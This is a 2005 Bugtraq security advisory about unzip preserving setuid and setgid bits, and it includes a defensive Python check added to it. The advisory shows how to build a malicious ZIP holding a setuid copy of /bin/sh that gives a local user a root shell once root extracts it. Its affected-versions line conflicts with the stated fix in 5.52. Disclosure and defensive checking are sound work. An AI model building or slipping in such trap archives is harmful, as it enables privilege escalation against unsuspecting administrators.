7a69Adv#22 - UNIX unzip keep setuid and setgid files

From: Albert Puigsech Galicia (ripe_at_7a69ezine.org)
Date: 02/28/05

    Date: Mon, 28 Feb 2005 13:17:02 +0000
    To: bugtraq@securityfocus.com
    
    

    - ------------------------------------------------------------------
           7a69ezine Advisories 7a69Adv#22
    - ------------------------------------------------------------------
      http://www.7a69ezine.org [26/01/2005]
    - ------------------------------------------------------------------

    Title: Unzip keep setuid and setgid files

    Author: Albert Puigsech Galicia - <ripe@7a69ezine.org>

    Software: Unzip

    Versions: >= 5.51

    Remote: No

    Exploit: yes

    Severity: Low/Medium

    - ------------------------------------------------------------------

    I. Introduction.

     UnZip is an extraction utility for archives compressed in .zip format. It's
    compatible with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS. The primary
    objectives have been portability and non-MSDOS functionality. More info about
    unzip on http://www.info-zip.org/pub/infozip/UnZip.html.

    II. Description.

     The unzip UNIX functionality allows you to preserve file permissions stored in
    compressed files, and of course that includes the setuid bit. Because it does
    not show a warning message before unpacking a setuid file, it is possible to
    create a malicious ZIP file that creates a setuid executable.

    III. Exploit

     It's really easy to test this vulnerability. You can create a malicious ZIP
    file following this example:

     $ cp /bin/sh .
     $ chmod 4777 sh
     $ zip malicious.zip sh

     When another user (including root) unpacks the file, a setuid shell file will
    be created without any warning, as you can see here:

     # id
     # unzip malicious.zip
     Archive: malicious.zip
      inflating: sh
     # ls -l sh
     -rwsrwxrwx 1 root root 705148 Jan 16 17:04 sh

     Of course you need a local account on the system to execute the file, so it's
    not a remote vulnerability.
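    As an added example (not part of the original advisory), the check a defender
    can run before handing an untrusted archive to unzip: Info-ZIP stores the Unix
    mode in the high 16 bits of each central-directory entry's external attributes,
    so setuid/setgid entries can be spotted without extracting anything. The sample
    archive below is constructed in memory and mirrors the advisory's "sh" with mode 4777.

```python
import io
import stat
import zipfile


def unix_mode(info: zipfile.ZipInfo) -> int:
    """Unix permission bits as stored by Info-ZIP's zip: the high 16 bits of
    the central-directory external attributes field (st_mode of the file)."""
    return (info.external_attr >> 16) & 0o7777


def find_setid_entries(data: bytes):
    """Return (name, mode) for every entry whose stored mode carries setuid
    or setgid. Reading the central directory is enough; nothing is extracted."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            mode = unix_mode(info)
            if mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((info.filename, mode))
    return hits


def build_sample_archive() -> bytes:
    """Constructed sample for this example: an 'sh' entry with mode 4777 as in
    the advisory, plus a harmless 0644 file. Payloads are dummy bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, mode, payload in (("sh", 0o4777, b"#!/bin/sh\n"),
                                    ("README", 0o644, b"hello\n")):
            zi = zipfile.ZipInfo(name)
            zi.create_system = 3  # 3 = Unix, so unzip honours the stored mode bits
            zi.external_attr = (stat.S_IFREG | mode) << 16
            zf.writestr(zi, payload)
    return buf.getvalue()


if __name__ == "__main__":
    for name, mode in find_setid_entries(build_sample_archive()):
        print(f"{name}: stored mode {mode:04o} carries setuid/setgid; "
              "refuse the archive or strip the bits before extracting")
```

    The same check works on a file on disk by passing its bytes to find_setid_entries;
    an archive created on a non-Unix system reports mode 0 and is simply not flagged.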

    IV. Patch

     Upgrade to unzip 5.52.

    V. Timeline

    12/01/2005 - Bug discovered
    16/01/2005 - Vendor contacted
    21/01/2005 - Vendor response
    25/01/2005 - Vendor patch provided
    28/02/2005 - New version published
    28/02/2005 - Advisory published

    VI. Extra data

     You can find more 7a69ezine advisories on this following link:

        http://www.7a69ezine.org/avisos/propios [spanish info]

